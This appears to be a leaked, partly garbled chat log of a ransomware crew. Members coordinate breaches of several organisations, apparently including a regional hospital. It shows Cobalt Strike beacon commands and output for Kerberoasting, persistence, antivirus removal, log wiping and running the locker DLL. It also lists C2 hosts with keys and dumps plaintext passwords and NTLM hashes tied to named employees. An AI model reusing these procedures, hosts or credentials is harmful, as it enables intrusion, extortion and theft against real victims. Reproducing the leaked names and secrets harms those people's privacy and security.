UPDATE added functionality to the option to run the locker, which removes some of the AV detects when dropping it to disk
Run via regsvr32
regsvr32.exe /s locker.dll - without arguments
regsvr32.exe /s /n /i: "here arguments" - with arguments
what do you have in the works at the moment? thanks
waiting for hashes in the root changes everything)
ah, well, once pressed do not trust ... on tilyufonin not trust, I pressed the hashes, the places clears
I don't trust tilufonin don't trust me, I clicked it, there are hashes and clears
to the work pc you hooked a personal iphone?
but here's what is it, I have to get dirty again and scour conferences
I also have not all left after reinstalling
I clean everything immediately after closing the entire computer. I sprinkle holy water.
I'm not talking about the last week
yes stop, in general, for all the time?
I'm talking about all the cases for all time)
there in the archive 2 files, 1 - ntlm, 2 - clears
40 archives will not download)
all ntlm in one archive
make in one file is not necessary divide the groups into the same
oba format will do a file only ntlm?
or is this okay?
silent. not let me in, cookies are rotten
all your ntlm hashes me in the archives collect from their cases
mine have fallen off - I'll try to re-enter them from public resources
you task for half an hour maximum - to collect the biggest lists of clean passwords + you have networks at work
good
gancet
so on tasks for today
a, everything ok
It's strange you two in my network
No one of them is bazetted anywhere?
hi all
hello
hi:moyai:
that logs are stored in a folder
ah yes and in the blog says as I understand
a unpacked kobalt not through install
a and it is unlikely the logs will be somewhere else
a bunch of folders are empty only found logs and backups
ubuntu make a restart old sessions will fall in some other place where the backup is there is an option to restart?
may be that the server remembers them because they were deleted during his work?
```
root@hostname:~/cobalt/logs# ls
201203
root@hostname:~/cobalt/logs# cd 201203
root@hostname:~/cobalt/logs/201203# ls
events.log weblog_443.log
```
I can't tell you the solution to beaconlog
but again, there's nothing to do with the logs. Have you cleaned the logs?
```
root@hostname:~/cobalt/logs# rm -r *
root@hostname:~/cobalt/logs# ls
root@hostname:~/cobalt/logs#
```
Should `~/cobalt/logs/` this folder have been deleted directly all logs for all numbers?
```
root@hostname:~/cobalt/logs/201201# ls
root@hostname:~/cobalt/logs/201201#
```
But there are still logs left in the second and third
there is only information in the logs that I entered and left it for the first number and folders rm -r *
two logs I moved to /home/ the rest rm *
did you delete all logs?
on the server deleted the contents of the folder 201201
i have no logs, no archives to synchronize together and the local client cleaned
then the contents of the folder logs comes to 20k and starts 1 byte per second and not vice versa
well, log it is saved from actions in the coben understood?
in home move it should help?
i just go into the koba and it creates a new one exactly the same - throw out the folder
kobeda))) the same logs
well yes from here `~/cobalt/logs/201201/139.62.193.40` here put `~/cobalt/logs`
move the logs to another place
adfind the damn thing
`beacon_1851575246.log`
)
okei year-month-number
and this is the datagram for the number on which the problem occurred
Delete everything?
and I didn't give you access)
`ssh: connect to host 104.243.40.126 port 22: Connection refused`
`ssh: connect to host likenic.com port 22: Connection refused`
`ssh: connect to host likenic.com port 38542: Connection refused`
csh won't let me onto the 21556 freespool
Give me access to the coba where all this shit happens
what's the "can't get it done" theme and not try anything to fix it?
i can't get access to citrix
so I do)
check better from the host from where access the same machine + ideally on the same machine at all)?
sox open in the same range where the host from which took the logins / I do not know, I have not faced), not allowed from our dedik, the credentials valid
https://10.0.254.1:44433/cloudBackupSettings.html_COPYtl2
or there are other options how to be? and watch the backups
need accesses in their lk search there
now will check with the server where found dk
heh, no)
soks throw from where took accesses?
and the creeds valid
apparently only on the rdp from their server works, but the granddick will not let e in
the center found with access and only av? well, yes, perhaps when you start a build it can be removed if suspicious behavior and is not removed on static?)
on some servers are 3-4 edr lol
nonu crypto what the starter?
and does not seem to be touched by anything
Noooo, with the disabled windefa starter will not be removed
The important thing is that you know where to go to get into the admin area
Then remove the browser, or go to his pk where access to webroute and do everything from there
with a high probability in webroute is a twofactor phone
superlogin
sbs pass )
10.0.0.20
```
Bitdefender
Malwarebytes Anti-Exploit
Malwarebytes' Anti-Malware
Seagull Security
```
More effective in terms of service accts try through sharpview - it's otherwise searched already and with the token of the superlogin itself
this tried with the token, yes
@user8 under YES token did you run it? if yes - it still might not work because there will be no authorization dc events if the account is a service one with a dc token
```
beacon> execute-assembly /home/user/Desktop/cobalt/Signature_Tools/exec-ass/SharpSniper.exe superlogin
[*] Tasked beacon to run .NET program: SharpSniper.exe superlogin
[+] host called home, sent: 113727 bytes
[+] received output:
[-] Invoke_3 on EntryPoint failed.
```
There's an interesting admin
```
User name                    superlogin
Full Name                    superlogin
Comment                      User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never
Password last set            5/21/2018 9:56:11 PM
Password expires             Never
Password changeable          5/21/2018 9:56:11 PM
Password required            Yes
User may change password     Yes
Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   Never
Logon hours allowed          All
Local Group Memberships      *Administrators  *ADSyncAdmins
Global Group memberships     *Server Management  *Discovery Management  *Hypervisor Access - V  *Domain Users  *VMware Admins  *Domain Admins  *Records Management  *All ITC  *Recipient Management  *Mailbox support  *Public Folder Manageme  *Organization Manageme  *SHOPTRAK CHINA USERS  *SQL Access - FULL SER
```
The admin accounts have this thing on the desktop
when you get
there, don't forget the proxy from the admin pc
webrootanywhere.com/v1/Account/login
and the admin where? outside?
https://www.ixbt.com/power/ups/multilink.shtml
on dc
```
beacon> shell type C:\MultiLink\README.txt
[*] Tasked beacon to run: type C:\MultiLink\README.txt
[+] host called home, sent: 59 bytes
[+] received output:
README.TXT for Liebert MultiLink
```
So here it is a little bit higher on the hell 6956 were alive at once how many servers ping
anu more servers and start sorting out build determine method
in case it will be useful ta)))
quietbk 6
okay +2 hours
This is 14 hours to rest 10 of which 2 on the road preparing to close
Why so early? Tomorrow by 4 then is it over?
nail the living 99 42 restored.
42 closed/applied for/killed the process erased I'm gonna wipe it all outMAIN\blove wingnut12# MAIN\Administrator cr1spy173 MAIN\rthomas !@#monstrosity2002 172.93.110.218:54536 wEjNq0mz7Dji7TjM6Xv3LIovTZIndMQkbj `````` crhs-security.main.crispregional.org CRRHPUMP2.main.crispregional.org ERROR: The RPC server is unavailable. ``` ``` PYXIS-CCE-PROD.main.crispregional.org ERROR: Logon failure: unknown user name or bad password. ``` ``` NovaNet.main.crispregional.org Didn't display the tosslist without an error `````` Admin G0F0rw@rd123! 10.75.0.170 10.75.0.171 10.75.0.172 10.1.0.170 10.1.0.171 10.1.0.172 `````` crhsesxi20.main.crispregional.org crhsesxi21.main.crispregional.org crhsesxi22.main.crispregional.org crhsesxi23.main.crispregional.org crhsesxi24.main.crispregional.org crhsesxi25.main.crispregional.org crhsesxi26.main.crispregional.org crhsesxi27.main.crispregional.org ``total ``` pyxistest.main.crispregional.org PYXIS-RPT.main.crispregional.org 3MCDIDAT.main.crispregional.org ADSelfService.main.crispregional.org crhs-security.main.crispregional.org CRRHPUMP2.main.crispregional.org PYXIS-CCE-PROD.main.crispregional.org PYXIS-APP.main.crispregional.org NovaNet.main.crispregional.org HISCODER.main.crispregional.org ``don't code ``` pyxistest.main.crispregional.org PYXIS-RPT.main.crispregional.org 3MCDIDAT.main.crispregional.org ADSelfService.main.crispregional.org crhs-security.main.crispregional.org CRRHPUMP2.main.crispregional.org ``FILESTORESQL.main.crispregional.org DHCP.main.crispregional.org CRR-WEB-WS01.main.crispispregional.org CRR-WEB-FS01.main.crispispregional.org CRR-WEB-BG01.main.crispispregional.org CRR-PRT-SER.main.crispregional.org CRRHPUMP2.main.crispregional.org CRHSWDS.main.crispregional.org crhs-security.main.crispregional.org AHTNH1.main.crispregional.org ADSelfService.main.crispregional.org 3MHIS.main.crispregional.org 3MCDISTEST.main.crispregional.org 3MCDIDAT.main.crispregional.org pth MAIN\Administrator e25c3e50d7638936c2f2ee77eebb1f24 
`````` TrinisysQA-APP.main.crispregional.org Trinisys-A8.main.crispregional.org Trinisys-A7.main.crispregional.org Trinisys-A6.main.crispregional.org Trinisys-A5.main.crispregional.org Trinisys-A4.main.crispregional.org Trinisys-A2.main.crispregional.org pyxistest.main.crispregional.org PYXIS-RPT.main.crispregional.org PyxisPharmTest.main.crispregional.org PyxisPharmLive.main.crispregional.org pyxismed.main.crispregional.org PYXIS-DB.main.crispregional.org PYXIS-CCE-TEST.main.crispregional.org PYXIS-CCE-PROD.main.crispregional.org PYXIS-APP.main.crispregional.org pyxisanest.main.crispregional.org NovaNet.main.crispregional.org Medisolv.main.crispregional.org INFOTVSV5.main.crispregional.org INFOTVSV4.main.crispregional.org INFOTVSV3.main.crispregional.org InfoTVsV2.main.crispregional.org INFOTVSV1.main.crispregional.org HISCODER.main.crispregional.org GEPACsTestWS GEPACS-TestCCG GEPACS-CCG FILESTORESQL.main.crispregional.org DHCP.main.crispregional.org CRR-WEB-WS01.main.crispispregional.org CRR-WEB-FS01.main.crispispregional.org CRR-WEB-BG01.main.crispispregional.org CRR-PRT-SER.main.crispregional.org CRRHPUMP2.main.crispregional.org CRHSWDS.main.crispregional.org crhs-security.main.crispregional.org AHTNH1.main.crispregional.org ADSelfService.main.crispregional.org 3MHIS.main.crispregional.org 3MCDISTEST.main.crispregional.org 3MCDIDAT.main.crispregional.org ``Not yet. Are we done yet? 10.1.21.95 10.1.21.98 `````` crhsesxi24.main.crispregional.org crhsesxi27.main.crispregional.org ``eThoit4Rueh4aigheiDeiqua means okay. [*] Tasked beacon to psinject: Invoke-Kerberoast -OutputFormat HashCat | fl | Out-File -FilePath c:/ProgramData/pshashes.txt -append -force -encoding UTF8 into 4540 (x64) ``Command includes hashkat parameter? is this invoke kerb removed from tulchyna format hashkat? nohashekat immediately duplicated herea you have fixed? 
kerb dropped tl2without response groups and oushkas not removed chotaTell me in groups in which workTax, let's see what was done while I was away and in general what is doneHelloHi!All helloTo all put their files and until tomorrow in slipDid you put? Until tonightDid you build the dll with the flag -keep? 1-2 pieces where there is a vomozozozhnosti put? beacon> shell reg query HKCU\Environment [*] Tasked beacon to run: reg query HKCU\Environment [+] host called home, sent: 57 bytes [+] received output: HKEY_CURRENT_USER\Environment Path REG_EXPAND_SZ %USERPROFILE%\AppData\Local\Microsoft\WindowsApps; TEMP REG_EXPAND_SZ %USERPROFILE%AppData\Local\Temp TMP REG_EXPAND_SZ %USERPROFILE%AppData\Local\Temp OneDrive REG_EXPAND_SZ C:{Windows\system32\config\systemprofile\OneDrive UserInitMprLogonScript REG_SZ rundll32.exe C:Windows\Temp\STA-NURSEAL-20201020-2033.dll,entryPoint `````` - Load this DLL into a writable directory - Click on session, persistence - non-elevated - userinitmprlogonscriptkey - Type Command : rundll32.exe C:\temp\keep64.dll,entryPoint (MUST specify full path to dll file, MUST rename dll file before loading into something more "organic" depending on files around it) - Run - Check if the registry entry was created with a shell reg query HKCU\Environment ``1 this is a must and 2 if all goes well tomorrow by 4 and tomorrow definitely closes 1-2 networks put in current networks new and you can go get it http://github.com/0xthirteen/StauKitokili at the end of this month or next month so new ones on receipt immediately check it when? 
old cobbs then disconnect you from english[ ](https://mediaeveryone.com/channel/general?msg=ZxszvNDaKbZKfk3fL) take it out who doesn`t already have it `` 23.106.160.195 https://topevi.com - 185.150.190.113:61718 O5xFflqqDG7LDQJUDbdtkkj54zQ8QDVMMI0W ``coba'' 74.118.138.108 https://wolfnew.com - 209.222.98.96:32878 onsOJxzeGz75Nt2p0tGYzjn7oTi5Eo6F644 ``Boys write here on VPN https://helpdocpt.club/forums/vpn.11/ like what's what''. user3 user3 @user3 💬 02:00 Domain ing server: STAKC-DC2019.STAKC.local:389 tl1 Team Lead 1 @tl1 Admin 02:01 I.e. to create a conf? user3 user3 @user3 💬 02:01 yes user 7,4,9,3 ``The one I asked you about? Will there be a confab or not? ``` Server Name IP Address ----------- ---------- FISHUSA-DC 192.168.1.91 ``EA ``` Administrator ``DA ``` Administrator dc-admin djpastore3219 percona3487 ``Hello Teamsters'' Username : nddevbernst * Domain : JDOSSN * NTLM : 5b622ad5d550408ed6260c2b8fb185cc>sAMAccountName : nddevkremmecredes changed today these are new pth JDOSSN\ndmicjsater 67595f137f7f5908e3ed202bc4b14aa9 I see here in terms of escalation just a systematic examination of files/share/available ARMs/container browsers/cache/emailnot kerberosti specifically about the tickets now, check on available hosts, which in memory there are kerberos ticketsada in homedirs also look at them some technical rights even have as you see-you have users here that are not the most fucked up so tohomedirs users look but do not get on them `` `` 172.31.190.102:445 (platform: 500 version: 5.0 name: NDHSNASC9014 domain: JDOSSN) [+] received output: 172.31.190.10:445 (platform: 500 version: 10.0 name: JDODC64 domain: JDOSSN) [+] received output: 172.31.190.12:445 (platform: 500 version: 10.0 name: JDODC65 domain: JDOSSN) [+] received output: 172.31.190.17:445 (platform: 500 version: 10.0 name: JDODHCP02 domain: JDOSSN) [+] received output: 172.31.190.47:445 (platform: 500 version: 10.0 name: JDODC67 domain: JDOSSN) [+] received output: 172.31.190.62:445 (platform: 
500 version: 6.3 name: JDOCHOPS12 domain: JDOSSN)
[+] received output:
172.31.190.66:445 (platform: 500 version: 6.3 name: JDOCHSVC12 domain: JDOSSN)
[+] received output:
172.31.190.100:445 (platform: 500 version: 5.0 name: NDHSNASC9102 domain: JDOSSN)
[+] received output:
172.31.190.101:445 (platform: 500 version: 5.0 name: NDHSNASC9103 domain: JDOSSN)
[+] received output:
172.31.190.103:445 (platform: 500 version: 5.0 name: NDHSNASTESTC001 domain: JDOSSN)
Scanner module is complete
``
otherwise, usually nothing can work, servers will see other subnets and segments, and look for servers.
So there is a differentiation of access rules through groups, right?
yes, i can assume that you can not get out of the subnet, judging by the currently available users
good link shown, impacket with lsassy with bloodhound, try it out.
and it has options to dump lsass and decrypt it
well, play with the tool; it works relying on bloodhound if properly configured, and if there is no direct path to the DA there is a plan of attack, but it relies on machines that are not visible in the network..
and under some conditions - no = )
under some conditions in general it is clear which groups admin which machines
as far as I remember it relies on the composition, if such a prescription, only changed the computer and it was left on the old
pulled?
yes, i already did)
i confess i do not use this thing and usually try to be careful with large networks, but it will be wildly noisy
try))
you can also remove bloodhound....
think and check the guess)a how can i learn what rights gives for example NDLEADING_Computer_Account_Adminspalping the grid and without simply brutal and neatly and neatly if you look closelyvobshchem here is where to click the buttons next>memberOf: CN=NDLEADING_Computer_Account_Admins,OU=Groups,OU=NDLEADING,OU=Customers,DC=jdossn,DC=local The girl also has this group of home directories available under their token when directly browsing the "pull up" directory >homeDirectory: \jdossn.local\homedirs\NDLEADING\andcarhsherm ``There's a home dir pulled from the fsu of these polzak cars are empty yes? Now there's another peculiarity looked where this thing goes on OU=NDLEADING and on OU=SD** I would have cheked this user now back to hell_compensation! and is there OU=NDLEADING? now further OU=WIRESTERER there is also an OU in ad_compsalternative group>memberOf: CN=WIRIESTERER_SD_Adminsthere is no such thing. sd seems to be a prefix that means locationand then we go logically and search by handThe most obvious - search for OU=SDa question - what is SD ? looking for an answer to it here's what to come up with a passord_reset ...which is in the group SD_Admins read the adda carefully, I also noticed it. 
Under the admins, it's mostly on the network, or this one ``` >memberOf: CN=NDLEADING_SD_Admins,OU=NDLEADING,OU=Customers,DC=jdossn,DC=local ``Look what an interesting group isn't`` >memberOf: CN=NDLEADING_Password_Reset_Users,OU=Groups,OU=NDLEADING,OU=Customers,DC=jdossn,DC=local`` User name ndcarjjohns Full Name Justin Johnson Comment User's comment Country/region code 000 (System Default) Account active Yes Account expires Never Password last set 10/15/2020 7:35:46 AM Password expires 1/7/2021 7:35:46 AM Password changeable 10/16/2020 7:35:46 AM Password required Yes User may change password Yes Workstations allowed All Logon script User profile Home directory \jdossn.local\homedirs\NDLEADING\andcarjjohns Last logon 10/19/2020 7:33:11 AM Logon hours allowed All Local Group Memberships Global Group memberships *Domain Users *NDLEADING_All_Users *NDLEADING_EQUIP_Users*NDLEADING_All_Email *NDLEADING_SD_Technici*NDLEADING_ALL The command completed successfully. `````` User name ndcardkolst Full Name Darlene Kolstad Comment carrington, nd User's comment Country/region code 000 (System Default) Account active Yes Account expires Never Password last set 10/20/2020 1:54:07 PM Password expires 1/12/2021 1:54:07 PM Password changeable 10/21/2020 1:54:07 PM Password required Yes User may change password Yes Workstations allowed All Logon script User profile Home directory \jdossn.local\homedirs\NDLEADING\andcardkolst Last logon 10/22/2020 7:31:17 AM Logon hours allowed All Local Group Memberships Global Group memberships *NDLEADING_ACCOUNTING *Domain Users *NDLEADING_Computer_Ac*NDLEADING_All_Users *NDLEADING_EQUIP_Repor*NDLEADING_EQUIP_Users *NDLEADING_EQUIPRDB-FI*NDLEADING_EQUIPPatch_ *NDLEADING_All_Email *NDLEADING_ALL *NDLEADING_Excel_Users*NDLEADING SharePoint *NDLEADING_Citrix_Loca The command completed successfully. 
`````` User name ndcarhsherm Full Name Hunter Sherman Comment Hunter Sherman User's comment Country/region code 000 (System Default) Account active Yes Account expires Never Password last set 10/20/2020 3:49:45 PM Password expires 1/12/2021 3:49:45 PM Password changeable 10/21/2020 3:49:45 PM Password required Yes User may change password Yes Workstations allowed All Logon script User profile Home directory \jdossn.local\homedirs\NDLEADING\andcarhsherm Last logon 10/22/2020 9:15:49 AM Logon hours allowed All Local Group Memberships Global Group memberships *Domain Users *NDLEADING_All_Users *NDLEADING_EQUIP_Users*NDLEADING_SD_Schedule *NDLEADING_All_Email *NDLEADING_SD_Technici *NDLEADING_SD_Users The command completed successfully. `````` User name ndmicjsater Full Name Jason Sateren Comment Michigan,ND User's comment Country/region code 000 (System Default) Account active Yes Account expires Never Password last set 10/22/2020 6:49:57 AM Password expires 1/14/2021 6:49:57 AM Password changeable 10/23/2020 6:49:57 AM Password required Yes User may change password Yes Workstations allowed All Logon script User profile Home directory \jdossn.local\homedirs\NDLEADING\ndmicjsater Last logon 10/22/2020 7:08:15 AM Logon hours allowed All Local Group Memberships Global Group memberships *Domain Users *NDLEADING_Password_Re *NDLEADING_PARTS *NDLEADING_Dealer_Port *NDLEADING_Computer_Ac*NDLEADING_All_Users *NDLEADING_EQUIP_Repor*NDLEADING_EQUIP_Users *NDLEADING_SD_Schedule*NDLEADING_EQUIPPatch_ *NDLEADING_All_Email *NDLEADING_SD_Managers *NDLEADING_EQUIP_SDK_U*NDLEADING_SD_Admins *NDLEADING_SD_Technici*NDLEADING SharePoint *NDLEADING_ALL *NDLEADING_SD_Users *NDLEADING_Excel_Users*NDLEADING SharePoint *NDLEADING_Citrix_Loca*NDLEADING_EQUIPRDB-AL The command completed successfully. 
`````` User name ndcartcarr Full Name Theresa Carr Comment Theresa Carr User's comment Country/region code 000 (System Default) Account active Yes Account expires Never Password last set 10/20/2020 11:54:49 AM Password expires 1/12/2021 11:54:49 AM Password changeable 10/21/2020 11:54:49 AM Password required Yes User may change password Yes Workstations allowed All Logon script User profile Home directory \jdossn.local\homedirs\NDLEADING\andcartcarr Last logon 10/22/2020 7:02:59 AM Logon hours allowed All Local Group Memberships Global Group memberships *Domain Users *NDLEADING_Password_Re *NDLEADING_Dealer_Port*NDLEADING_Computer_Ac *NDLEADING_All_Users *NDLEADING_EQUIPRDB-SE *NDLEADING_EQUIP_Users*NDLEADING_SD_Schedule *NDLEADING_All_Email *NDLEADING_SD_Managers *NDLEADING_SERVICE *NDLEADING_ALL *NDLEADING SharePoint The command completed successfully. `````` User name ndevbernst Full Name Blaine Ernst Comment BLAINE ERNST User's comment Country/region code 000 (System Default) Account active Yes Account expires Never Password last set 10/21/2020 6:22:54 AM Password expires 1/13/2021 6:22:54 AM Password changeable 10/22/2020 6:22:54 AM Password required Yes User may change password Yes Workstations allowed All Logon script User profile Home directory \jdossn.local\homedirs\NDLEADING\nddevbernst Last logon 10/22/2020 2:16:08 PM Logon hours allowed All Local Group Memberships Global Group memberships *Domain Users *NDLEADING_Password_Re *NDLEADING_Dealer_Port*NDLEADING_Computer_Ac *NDLEADING_All_Users *NDLEADING_EQUIP_Users *NDLEADING_SD_Schedule*NDLEADING_EQUIPPatch_ *NDLEADING_All_Email *NDLEADING_SD_Managers *NDLEADING_EQUIP_SDK_U*NDLEADING_SD_Admins *NDLEADING_SD_Technici*NDLEADING_ALL *NDLEADING_Excel_Users*NDLEADING_Citrix_Loca *NDLEADING_EQUIPRDB-AL The command completed successfully. ``if. 
``` >trustAttributes: 0 [] ``` then we can consider that the trust does not work?there is only 1 out of 4 trusts alive and it pings with a loss of 100% and maybe it will save you time but i recommend to learn the command tool requires additional setup as you see it is very useful in case you have some credits `ndmicjsater` `ndcarddalma` `nddevbernst` have i thrown you this tool? https://github.com/Hackndo/Іѕаѕѕуа just threw it to the guys. i've been collecting everything i could get my hands on? pth W08872612198 "Remote Support" 296c19b3d2cb8e8729e5fe27f6cf764a Username : nddevbernst Password : NDleading2021! LEADMIN Deere0419! Username : ndcartcarr Domain : JDOSSN NTLM : b25a68a3d5bc30ea97872f6b004c58be SHA1 : d7a0e055c8e4b9947e48d99a66223a3dbe522bee Username : ndmicjsater Domain : JDOSSN NTLM : c60a90ad0e486ae0efd1229b04824948 SHA1 : 450a811afd21b2f402b34575cbca7f386a3b2a47 DPAPI : 5708598b47c3d8cea60c8bbd8d6d12bf jason:1003:aad3b435b51404eeaad3b435b51404ee:c06bbf80fa38c366ca3803b9e922bdd4::: Remote Support:1002:aad3b435b51404eeaad3b435b51404ee:227a7d16ba750264459c885d666b7eaa::: Username : ndcarhsherm Domain : JDOSSN NTLM : d7341bcb2ca0f8586c6f1974ead1ab1f SHA1 : c7b7b0db23a67ce02082c6351720a1fc5ac40d69 DPAPI : cfa41b24958547a50b0604ba6d0d04f6 Username : ndcardkolst Domain : JDOSSN NTLM : b9b6aa1456c1a351844910877a487cf9 SHA1 : efae1f6b171a18bf4b16231fcc32d23df10e538e DPAPI : a4dbe1e1a06257d0c44b1a009045169e Username : ndcartcarr Domain : JDOSSN NTLM : 526ec72d381501fffb75e74934827f2f SHA1 : 9ccae5674e564db712b7a9be8ebcba4d754f57c9 DPAPI : c652bcd334907d5d084167b804d14ccf * Username : ndcarrtedro * Domain : JDOSSN * NTLM : c9e553f47018e2be97ec3307bd47df25 * SHA1 : f6769930484ed5afd45e5aa95d1490e0fe2042e2 * Username : ndcarjjohns * Domain : JDOSSN * NTLM : 4178a0f16bad0c2a649398e88994568c * SHA1 : ddc6c829305d0282c54b3fed400c67a999e71611 * DPAPI : 4fdbb5025f3fec11c123375623d2287a * Username : ndcarjjohns * Domain : JDOSSN.LOCAL * Password : Ndleading11 * Username 
: nddevkodell * Domain : JDOSSN * NTLM : 1ae22c3e605fcb0a1d17d7c0b8509281 * SHA1 : 780ca6033c42c3b6ab91fd119e5a1b4c2db2696f * DPAPI : 0f4bacdbd1dc64f63ecfda1d9c05d690 * Username : ndcarddalma * Domain : JDOSSN * NTLM : db7aa0db0148b3b707b9ae6de91e3f25 * SHA1 : 9eaec33adae1e6193d9c381e449271008c5b0035 * DPAPI : 830d9615902b542addd3faeeca02ba3e ``Good morning countryuser9user8@tl2 add 8 and 9 here domainhostname doesn't resolve or catch 100% loss? so never turned on the VPN? all, my chizhik went home...there is one 2003. tried ms17, netapi, blukip, spoolss - all to no avail. I tried 17-10 and maybe it will work, but it needs the codes ... 37 pieces visible only there are nothing visible computers, I'll compare 6 pieces>operatingSystem: Windows Server 2003 then do not wait for hashes) and no password from the polozak only today the domain appeared. I think yesterday I wrote off. domain behind the vpn2 day in operation, you only removed the hashes? there at least need the system. and the cross of course too early to put, just started to immediately put a cross on the network there is an account at the entrance is not a hash is rarely there is something there ... out of 5 people did not remember?) I, by the way, forgot to check the descriptors. well that reminded me) and the dictionary bruta as a local admin somewhere or not among admins ... apparently the network scanner may not be among the admins ... >description: (Left 22/03/18) PW: L3av3r2018 >description: ``who/what? dn:CN=RCP Scanning,OU=Ireland,OU=Ball Users,DC=ballymoregroup,DC=local >objectClass: top >objectClass: person >objectClass: organizationalPerson >objectClass: user >cn: RCP Scanning >sn: Scanning >description: Scans123 No, I'm still going through the files, but he's so fucked up that it's faster to crack a password))[ ](https://mediaeveryone.com/group/ballymoregroup-com?msg=gB636LLSfv3w4ygbh) just sit and wait?)? Is this some kind of joke? Like what? And the rest...? 
The user has no rights anywhere, so we wait for hashes...WPN ``` server REG_SZ 46.34.1.2:4433 domain REG_SZ LocalDomain user REG_SZ rpearce owner REG_SZ BALLYMOREGROUP\rpearce ``DK ``` Server Name IP Address ----------- ---------- BALLY44HODC1 192.0.2.246 BALLY35303 192.168.3.159 EGDC2 192.168.200.160 BGAZRDC01 10.0.180.6 ``EA ``` Administrator CITAdmin ``YES ``` Administrator AHarrison amihhaljova aseymour bespadmin CITAdmin completeit david.meadows isobtchak jay.newell nreid rdeason sdunn traubenheimer ``What's the plan? prtuuzhe isgrantweber.comuser9 to confDisplaying is)Create a confinement grantweber.comI need to leave to transfer money for the internet and pay extra for a speedup katyda domainkredyvot by the way, since lin in domainkat there was a chain from the current to timesavers and from there through the IT people to linux1.The network of 20 computers is done,pkgprod.com) go to the IT guys and see if they have another domain. 192.168.5.99:445 (platform: 500 version: 6.1 name: RHEL8 domain: TIMESAVERS) 192.168.5.18:445 (platform: 500 version: 6.1 name: TSLINUX domain: TIMESAVERS) ``There's more sessions coming in, so let's either take them to work or finish them from the current open ones.``Key Capi for the future, don't ever fucking rush from SYSTEM from windows system32starting always from there and for the futureOrdered from sys32gotovo from under winlogon? Or they're up or something else look at the processes, is there an uplocker? Put it in C:\windows\system32beacon> shell dir [*] Tasked beacon to run: dir [+] host called home, sent: 34 bytes [+] received output: Volume in drive C has no label. Volume Serial Number is 7376-91FE Directory of C:\hp 10/20/2020 02:36 PM . 10/20/2020 02:36 PM . 
02/09/2017 11:57 PM 9,662 csIcon.ico
08/15/2019 11:04 AM <DIR> hpdiags
08/15/2019 10:57 AM <DIR> hpsmh
02/11/2014 10:11 AM <DIR> sslshare
10/20/2020 02:19 PM 189,440 start.exe
09/15/2016 12:46 AM 2,307 survey.dtd
10/20/2020 02:40 PM 189,440 Updater.exe
4 File(s) 390,849 bytes
5 Dir(s) 430,841,409,536 bytes free
Do you know if there are any backups in the vg? Maybe it takes a long time
``.
beacon> shell C:\hp\Updater.exe
[*] Tasked beacon to run: C:\hp\Updater.exe
[+] host called home, sent: 48 bytes
beacon> run C:\hp\Updater.exe
[*] Tasked beacon to run: C:\hp\Updater.exe
[+] host called home, sent: 35 bytes
beacon> execute C:\hp\Updater.exe
[*] Tasked beacon to execute: C:\hp\Updater.exe
[+] host called home, sent: 25 bytes
``
Why?
On the DC the locker doesn't work, encrypted until it's cut off, there are backups and virtuals
All encrypted except the DC
poc domain, don't tamper with the accesses in the vg
they have now)
```
02:09 PM
``
Orderly, in 4 hours only would have to run the build, so there is no need to rush
This is late found)
Yes
LfA, have you already started to run the build?
[+] received output: 192.168.5.12:445 [+] received output: 192.168.5.13:445 [+] received output: 192.168.5.17:445 (platform: 500 version: 6.1 name: KEY2 domain: SAMBA) 192.168.5.18:445 (platform: 500 version: 6.1 name: TSLINUX domain: TIMESAVERS) 192.168.5.23:445 192.168.5.24:445 [+] received output: 192.168.5.25:445 192.168.5.26:445 192.168.5.27:445 192.168.5.28:445 192.168.5.30:445 [+] received output: 192.168.5.98:445 (platform: 500 version: 6.1 name: TSLINUX98 domain: WORKGROUP) 192.168.5.117:445 (platform: 500 version: 4.9 name: KEY domain: DMX) [+] received output: 192.168.5.99:445 (platform: 500 version: 6.1 name: RHEL8 domain: TIMESAVERS) 192.168.5.188:445 192.168.5.229:445 [+] received output: 192.168.5.231:445 192.168.5.232:445 192.168.5.237:445 [+] received output: 192.168.5.240:445 (platform: 500 version: 4.9 name: TS-IX4A domain: WORKGROUP) 192.168.5.241:445 (platform: 500 version: 4.9 name: TS-IX4A domain: WORKGROUP) 192.168.5.242:445 (platform: 500 version: 4.9 name: TS-IX4B domain: WORKGROUP) 192.168.5.243:445 (platform: 500 version: 4.9 name: TS-IX4C domain: WORKGROUP) [+] received output: 192.168.5.245:445 (platform: 500 version: 6.1 name: AS7004T-D8A5 domain: WORKGROUP) 192.168.5.246:445 (platform: 500 version: 6.1 name: AS7004T-D8E3 domain: WORKGROUP) 192.168.5.247:445 (platform: 500 version: 6.1 name: AS7004T-D8E5 domain: WORKGROUP) 192.168.5.248:445 (platform: 500 version: 6.1 name: AS7004T-D8BB domain: WORKGROUP) Scanner module is complete `````` /FORCEUNINSTALL Forcibly removes McAfee Agent from the client system. 
Example: FrmInst.exe /FORCEUNINSTALL `````` net share {sharename | devicename | drive:path} /DELETE `````` Share name Comment ---------- ------- ADMIN$ Remote Admin C$ Default share IPC$ Remote IPC NETLOGON Logon server share Shares SYSVOL Logon server share ``` how do i remove the balloon from the dc ?i'll move the group to 1.deonepick how do i put it in .exe and somehow start.exe or something like that there .ex_How do i rename it ? The extension ?Do not forget that dc is the last thing to do) 1CvlfdsVN58QacQDIsVwk3cXrUrgRjXN3G4R1hrWBzYkuyww5cteLGD4ryuGnv 1) at the time I got the message the link was already invalid. 2) I did not order them I wrote you on the 16th of the year I have to prepare in advance I do not have it too so this is the pointWhere do we have it? Why now? Time is not right. Do you have a build? We need to lock it fasterDefender turned off in general Prepare it and look for Makafi turn off there are some satchels?) http://www.pkgprod.com/поставим build today ok[ ] (https://mediaeveryone.com/group/pkgprod-com?msg=uRSXzYBQkq78kpC9L) and their site has) thereThere is a guy sitting in business dealing with PC billing for $ 2k `` `` pack3009 ``on the avlab just like that)`` There is a possibility to check 5c9f2b00a6b5cd75dc76e2adb3369271da and there are no trustsPose a story /16chet half a pc online ... now will doa did you re-take the hell info? 2k12server - no frontdesk - macAfee pkg-101 - macAfee timeclocksql - no barbara-hp-2019 - macAfee winDef sales2-hp-2019 - McAfee winDef sales1-hp-2019 - McAfee `````` [+] received output: 192.168.168.5:22 (SSH-2.0-OpenSSH_4.3) 192.168.168.1:22 (SSH-2.0-OpenSSH_7.2) That's two local users. 500 Administrator 6f2cc106781ba05ddc908d6e32eb1838 66048 502 krbtgt d37d5fe30400ee01f2c2d09ba1b36d9a 514 How do you know if you have a local admin on the dk? 
